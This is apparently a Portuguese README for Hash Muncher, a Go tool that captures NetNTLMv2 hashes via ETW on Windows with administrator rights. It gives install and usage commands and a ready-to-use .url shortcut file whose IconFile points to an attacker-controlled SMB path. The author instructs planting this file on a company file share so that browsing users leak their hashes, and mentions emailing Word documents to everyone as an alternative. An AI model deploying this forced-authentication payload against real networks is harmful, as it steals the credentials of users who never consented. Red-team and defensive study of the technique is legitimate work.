
Capturar hashes NetNTLMv2 usando ETW com privilégios administrativos no Windows 8.1 / Windows Server 2016 e versões posteriores
Capture hashes NetNTLMv2 usando ETW com direitos administrativos no Windows
Três opções diferentes para colocá-lo em funcionamento
go install github.com/lkarlslund/hashmuncher@latest
git clone https://github.com/lkarlslund/hashmuncher
cd hashmuncher
./build.ps1
Garanta que o Firewall do Windows permita "Compartilhamento de Arquivos e Impressoras", pois o Hash Muncher requer o serviço SMB integrado para enviar e receber a solicitação inicial e enviar pacotes de resposta ao alvo.
Em um prompt elevado, execute o Hash Muncher
hashmuncher.exe [-output filename.txt] [-timeout nnn] [-tracename yourname] [-help]
[InternetShortcut]
URL=Munch
WorkingDirectory=MunchMunch
IconFile=\\10.1.2.3\%USERNAME%.icon
IconIndex=1
Substitua o endereço IP pela sua máquina Hash Muncher e salve o arquivo em um compartilhamento de arquivos (da empresa) como 'whatever.url', e observe os hashes chegando.
Existem outros métodos mencionados em Red Team Notes - Forced Authentication, e você provavelmente também pode obter sucesso enviando por e-mail um documento do Word para todos, mas isso não é nada furtivo.
Tenho brincado com ETW de vez em quando, mas quando vi a pesquisa muito legal da Nettitude Labs soube que precisava transformar isso em uma ferramenta fácil de usar na minha linguagem favorita, Golang! A Nettitude Labs tem um POC funcional escrito em C# rodando no framework .Net, e pode ser uma opção melhor para você. Então não estou realmente inventando nada aqui, apenas adicionando isso como uma alternativa.
Se você gosta de coisas de segurança do Windows, também pode gostar da minha ferramenta de gráfico de ataques Adalanche